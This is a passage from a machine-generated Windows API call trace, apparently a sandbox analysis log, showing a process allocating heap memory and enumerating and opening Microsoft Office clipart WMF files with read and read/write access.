HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0101.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0101.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0101.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0101.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0101.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0101.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0101.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0101.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0101.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0101.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.554] AreFileApisANSI () returned 1 [0101.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0101.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0101.554] AreFileApisANSI () returned 1 [0101.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0101.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 69 [0101.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04191_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.554] GetFileType (hFile=0x33c) returned 0x1 [0101.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0101.555] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.555] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.555] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.555] CloseHandle (hObject=0x33c) returned 1 [0101.555] AreFileApisANSI () returned 1 [0101.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a238 [0101.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 69 [0101.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04191_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.556] GetFileType (hFile=0x33c) returned 0x1 [0101.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0101.556] CloseHandle (hObject=0x33c) returned 1 [0101.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0101.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0101.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0101.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0101.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.557] AreFileApisANSI () returned 1 [0101.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a790 [0101.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 69 [0101.557] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04191_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19ec)) returned 1 [0101.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0101.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0101.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.557] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1204, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN04195_.WMF", cAlternateFileName="")) returned 1 [0101.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0101.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0101.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0101.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0101.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0101.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0101.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fe78 [0101.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0101.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0101.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0101.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0101.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.558] AreFileApisANSI () returned 1 [0101.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0101.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0101.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0101.559] AreFileApisANSI () returned 1 [0101.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a2d0 [0101.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 69 [0101.559] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04195_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.559] GetFileType (hFile=0x33c) returned 0x1 [0101.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0101.559] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.559] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.560] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.560] CloseHandle (hObject=0x33c) returned 1 [0101.560] AreFileApisANSI () returned 1 [0101.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a790 [0101.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 69 [0101.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04195_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.560] GetFileType (hFile=0x33c) returned 0x1 [0101.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0101.560] CloseHandle (hObject=0x33c) returned 1 [0101.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0101.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0101.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0101.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0101.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0101.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0101.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0101.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0101.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.562] AreFileApisANSI () returned 1 [0101.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0101.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program 